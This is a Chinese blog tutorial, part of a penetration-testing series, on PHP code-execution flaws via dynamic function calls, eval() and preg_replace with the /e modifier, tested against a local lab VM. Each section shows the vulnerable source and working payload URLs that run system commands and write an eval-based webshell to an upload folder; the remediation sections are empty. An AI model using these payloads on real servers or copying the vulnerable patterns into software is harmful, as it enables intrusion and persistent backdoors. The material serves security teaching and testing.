91.网络安全渗透测试—[常规漏洞挖掘与利用篇7]—[代码执行漏洞与利用]

最新推荐文章于 2024-04-10 13:27:43 发布
最新推荐文章于 2024-04-10 13:27:43 发布
阅读量3.1k 收藏 9
点赞数 2
分类专栏: # 1.网络安全渗透测试-[持续更新] 文章标签: 动态代码执行漏洞利用 eval代码执行漏洞利用 assert代码执行漏洞利用 正则代码执行漏洞利用 代码执行漏洞利用实战示例
clqwsn
本文链接:https://blog.csdn.net/qq_45555226/article/details/122769074
版权
本文深入探讨了代码执行漏洞,包括动态代码执行、eval和正则代码执行。通过实例分析了如何利用这些漏洞,展示了payload的构造方法,并强调了安全修复的重要性。内容涵盖漏洞的概念、利用方式、可控性分析以及总结,旨在提升安全意识和防护能力。
摘要由CSDN通过智能技术生成

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

一、代码执行漏洞简介

1、代码执行漏洞概念:

       当应WEB用在调用一些字符串转化为代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞(代码执行漏洞)。

2、代码执行函数:

PHPpythonJava
eval()、assert()、preg_replace()exec()没有类似于前面两者的函数,但是有反射机制,并且有基于反射机制的表达式引擎,如:0GNL、SpEL、MVEL等

二、代码执行漏洞利用

1、动态代码执行漏洞

(1)实验环境:
1.靶机环境
(1)虚拟机Ubuntu【192.168.97.133/exp】【www.webtester.com】
(2PHP 5.5.9-1ubuntu4.273)Apache/2.4.7 (ubuntu)

2.攻击主机:
(1)虚拟机win7【192.168.97.130】【www.exploit.com】
(2)工具:firefox+hackbar+burpsuite

3.实验网络:
(1)Vmware的NAT连接
(2)靶机链接:
http://www.webtester.com/code/code01.php?a=assert&b=m_print()
(3)漏洞描述:
1.使用哪个代码执行函数?
2.以什么方式调用代码执行函数中的字符串?
3.用户对转化为代码的字符串是否可控?
(4)漏洞分析:

1.0 漏洞点:code01.php

1.1 关键源码分析:code01.php

<?php
	function m_print(){
		echo '这是一个页面';
	}
	$_GET['a']($_GET['b']);
?>

1.2 漏洞分析:

1.使用哪个代码执行函数?
	可以自己控制
	
2.以什么方式调用代码执行函数中的字符串?
	以动态变量引入的方式调用代码执行函数中的字符串
	
3.用户对转化为代码的字符串是否可控?
	完全可控
(5)漏洞利用:

1.0 测试: assert 可以执行php里面的一些函数比如phpinfo()、system()、var_dump()、fputs()、fopen()等等。

payload-1:http://www.webtester.com/code/code01.php?a=assert&b=phpinfo()
在这里插入图片描述

payload-2:http://www.webtester.com/code/code01.php?a=assert&b=system(id)
在这里插入图片描述

payload-3:http://www.webtester.com/code/code01.php?a=assert&b=var_dump(qwsn)
在这里插入图片描述

payload-4:http://www.webtester.com/code/code01.php?a=assert&b=fputs(fopen("../upload/shell.php","a"),"<?php phpinfo();eval(\$_POST[123]);?>")

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(6)漏洞修复:

(7)漏洞总结:
1.使用哪个代码执行函数?
	可以自己控制
	
2.以什么方式调用代码执行函数中的字符串?
	以动态变量引入的方式调用代码执行函数中的字符串
	
3.用户对转化为代码的字符串是否可控?
	完全可控

4.assert代码执行函数的使用
	assert(phpinfo());
	assert(system(id));
	assert(var_dump(qwsn));
	assert(fputs(fopen("../upload/shell.php","a"),"<?php phpinfo();eval(\$_POST[123]);?>"));

5.一句话中需要添加一个反斜杠,否则写不进入
	eval(\$_POST[123]);?>");

2、eval代码执行漏洞

(1)实验环境:
1.靶机环境
(1)虚拟机Ubuntu【192.168.97.133/exp】【www.webtester.com】
(2PHP 5.5.9-1ubuntu4.273)Apache/2.4.7 (ubuntu)

2.攻击主机:
(1)虚拟机win7【192.168.97.130】【www.exploit.com】
(2)工具:firefox+hackbar+burpsuite

3.实验网络:
(1)Vmware的NAT连接
(2)靶机链接:
http://www.webtester.com/code/code02.php?data=%E6%9A%97%E6%9C%88%E5%9F%B9%E8%AE%AD%E7%B3%BB%E7%BB%9F
(3)漏洞描述:
1.使用哪个代码执行函数?
2.以什么方式调用代码执行函数中的字符串?
3.用户对转化为代码的字符串是否可控?
(4)漏洞分析:

1.0 漏洞点:code02.php

1.1 关键源码分析:code02.php

<?php  
	$data = isset($_GET['data'])?$_GET['data']:'这是一个eval漏洞页面';  
	@eval($ret = $data);  
	echo $ret;
?>

1.2 漏洞分析:

1.使用哪个代码执行函数?
	eval()代码执行函数
	
2.以什么方式调用代码执行函数中的字符串?
	以动态变量引入的方式调用代码执行函数中的字符串
	
3.用户对转化为代码的字符串是否可控?
	完全可控
(5)漏洞利用:

1.0 测试:eval可以执行php里面的一些函数比如phpinfo()、system()、var_dump()、fputs()、fopen()等等,需要注意,与assert不同的是,eval()函数内的函数必须要以分号结尾,否则无效。

payload-1:http://www.webtester.com/code/code02.php?data=phpinfo();
在这里插入图片描述

payload-2:http://www.webtester.com/code/code02.php?data=system(id);
在这里插入图片描述

payload-3:http://www.webtester.com/code/code02.php?data=var_dump(qwsn);
在这里插入图片描述

payload-4:http://www.webtester.com/code/code02.php?data=fputs(fopen("../upload/shell2.php","a"),"<?php phpinfo();eval($_POST[123]);?>");

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(6)漏洞修复:

(7)漏洞总结:
1.使用哪个代码执行函数?
	eval()代码执行函数
	
2.以什么方式调用代码执行函数中的字符串?
	以动态变量引入的方式调用代码执行函数中的字符串
	
3.用户对转化为代码的字符串是否可控?
	完全可控

4.assert代码执行函数的使用
	eval(phpinfo(););
	eval(system(id););
	eval(var_dump(qwsn););
	eval(fputs(fopen("../upload/shell2.php","a"),"<?php phpinfo();eval(\$_POST[123]);?>"););

5.一句话中需要添加一个反斜杠,否则写不进入
	eval(\$_POST[123]);?>");

6.eval与assert不同的是,其内部的函数需要使用分号结尾,否则无效果。
	eval(phpinfo(););
	assert(phpinfo());

3、正则代码执行漏洞

(1)实验环境:
1.靶机环境
(1)虚拟机Ubuntu【192.168.97.133/exp】【www.webtester.com】
(2PHP 5.5.9-1ubuntu4.273)Apache/2.4.7 (ubuntu)

2.攻击主机:
(1)虚拟机win7【192.168.97.130】【www.exploit.com】
(2)工具:firefox+hackbar+burpsuite

3.实验网络:
(1)Vmware的NAT连接
(2)靶机链接:
http://www.webtester.com/code/code03.php
(3)漏洞描述:
1.使用哪个代码执行函数?
2.以什么方式调用代码执行函数中的字符串?
3.用户对转化为代码的字符串是否可控?
(4)漏洞分析:

1.0 漏洞点:code03.php

1.1 关键源码分析:code03.php

<?php  
	$data = $_GET['data'];  
	preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";',$data);  
?>
<form>
	<label>请输入你的数据</label>
	<input type='text' name='data'/>
	<input type='submit' value='提交'/>
</form>

1.2 漏洞分析:

1.使用哪个代码执行函数?
	preg_replace()代码执行函数
	
2.以什么方式调用代码执行函数中的字符串?
	以动态变量引入的方式调用代码执行函数中的字符串
	
3.用户对转化为代码的字符串是否可控?
	部分可控

1.3 preg_replace /e修正符的危险: 传送门1传送门2

(5)漏洞利用:

1.0 测试:preg_replace可以执行php里面的一些函数比如phpinfo()、system()、var_dump()、fputs()、fopen()等等。

payload-1:http://www.webtester.com/code/code03.php?data=<data>{${phpinfo()}}</data>
在这里插入图片描述

payload-1:http://www.webtester.com/code/code03.php?data=<data>{${system(id)}}</data>
在这里插入图片描述

payload-1:http://www.webtester.com/code/code03.php?data=<data>{${var_dump(qwsn)}}</data>
在这里插入图片描述

payload-1:http://www.webtester.com/code/code03.php?data=<data>{${fputs(fopen("../upload/shell.php","a"),"<?php phpinfo();eval(\$_POST[123]);?>")}}</data>
【失败】

(6)漏洞修复:

(7)漏洞总结:
1.使用哪个代码执行函数?
	eval()代码执行函数
	
2.以什么方式调用代码执行函数中的字符串?
	以动态变量引入的方式调用代码执行函数中的字符串
	
3.用户对转化为代码的字符串是否可控?
	完全可控

4.assert代码执行函数的使用
	前提:preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";',$data); 
	姿势1preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";','<data>{${phpinfo()}}</data>'); 
	姿势2preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";','<data>{${system(id)}}</data>'); 
	姿势3preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";','<data>{${var_dump(qwsn)}}</data>');
qwsn
关注
专栏目录
[网络安全自学] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[车联网安全自学] Android安全之APK逆向入门介绍
橙留香Park的博客
09-13 1万+
[车联网安全自学] Android安全之APK逆向入门介绍;2021年注定是一个不平凡的一年,这一年每个人都需要付出更多的努力,一定要脚踏实地,默默努力奋斗。
CVE-2019-0708漏洞利用源码.rar
01-04
Windows操作系统远程桌面服务漏洞(CVE-2019-0708)威胁程度较高,攻击者可以利用漏洞远程无需用户验证通过发送构造特殊的恶意数据在目标系统上执行恶意代码,从而获取机器的完全控制。此漏洞易被蠕虫病毒、勒索病毒等恶意程序利用
代码执行漏洞
qq_58000413的博客
10-06 1605
echo 1)) //eval代指多行执行的函数。') //匿名函数。程序员偷懒用的,有一些函数临时用一用,开发名字都懒得写,而且为了精简代码,他们用匿名函数。2.file_put_contents() //写一个php文件。回调函数,调用某个函数,不止一个回调函数。在abc中匹配a如果匹配到了执行中间的函数,需要匹配到。eval代码执行用的最多的,他可以。RCE(远程命令或者代码执行
渗透测试笔记】五、代码执行漏洞
【User Not Found】的博客
04-23 653
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录实验环境关于漏洞漏洞挖掘安全级别:Low安全级别:Medium安全级别:High漏洞利用获取reverse shell漏洞预防 实验环境 本实验基于以下环境: ...
【复习】代码执行_01_漏洞利用
qq_45300786的博客
05-23 348
代码执行漏洞利用 当应用在调用一些字符串转化为代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞(代码执行漏洞)。 PHP eval()、assert()、preg_replace() python exec() Java 没有类似于前面两者的函数,但是有反射机制,并且有基于反射机制的表达式引擎,如:0GNL、SpEL、MVEL等 1. 动态代码执行 <?php function m_print(){ echo '这是一个页面'; } $
代码执行漏洞 | iwebsec
weixin_52116519的博客
03-04 2938
call_user_func()、call_user_func_array()函数的功能是调用函数,多用在框架中动态调用函数,所以一般比较小的程序较少出现这种方式的代码执行。array_map()函数的作用是调用函数,并且除第一个参数外其他参数为数组,通常会写死第一个参数,即写死调用函数。
100.网络安全渗透测试—[常规漏洞挖掘利用16]—[密码找回漏洞与测试]
qwsn
02-05 4512
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、密码找回漏洞与测试 1、密码找回漏洞简介 2、密码找回漏洞测试 (1)源码审计:forget.php (2)正常的密码找回过程: (3)密码找回漏洞分析: (4)密码找回漏洞测试: (5)漏洞总结:
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3179
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
代码执行漏洞笔记
最新发布
weixin_45653478的博客
04-10 718
在 windows 系统下的 cmd 命令中,有以下一些截断拼接符。前面的语句为假则直接执行后面的;&&前面的语句为假则直接出错,后面的也不执行;直接执行后面的语句||前面出错执行后面的在 Linux 系统下的 shell 命令中,有以下一些截断拼接符。给大家强调一下,在 linux 下和在windows下的命令拼接符有一定的区别在 Linux 上,上面的;也可以用 | 、|| 代替;;前面的执行执行后面的ifconfigifconfig| 是管道符,显示后面的执行结果。
漏洞利用代码
p656456564545的专栏
01-09 661
zabbix注入 http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29
命令执行漏洞利用技巧总结
st3pby的博客
05-19 2638
在红蓝对抗中,远程命令执行漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行漏洞漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。目标操作系统类型、执行命令结果是否有回显以及是否能通外网。
让命令执行漏洞无所遁形:详解其利用方式和危害因素
weixin_43263566的博客
02-01 1295
命令执行利用
Web漏洞-命令执行代码执行漏洞
Ays.Ie的博客
03-13 1856
描述了web漏洞-命令执行代码执行漏洞
[渗透测试]—7.1 漏洞利用开发和Shellcode编写
Andy0214的专栏
06-28 5874
本章节讲解了漏洞利用开发和Shellcode编写的基本概念和技巧。我们通过一个简单的Shellcode示例和一个Metasploit模块示例来演示了如何编写漏洞利用代码。当然,实际漏洞利用开发过程会更加复杂,需要你不断学习和实践。希望这个章节能为你提供一个良好的起点,帮助你掌握高级渗透测试技术。
远程代码执行漏洞利用
Z_l123的博客
03-01 408
PHP下,允许命令执行的函数有 eval() assert() preg_replace() call_user_func() $a($b) eval() <?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?> assert() <?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ e
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
ZhangAweio的博客
04-06 759
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句话木马成功访问不是PHP结尾的文件,文件包含漏洞危害及其大,如有被利用不堪设想。
Android漏洞挖掘技术综述与趋势分析
符号执行技术利用程序的抽象表示来探索代码路径,有助于发现隐藏的逻辑错误和输入敏感性漏洞。Fuzzing测试则是一种随机或智能生成测试数据以触发程序异常的方法,有助于检测边界条件和内存管理问题。混合符号执行和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值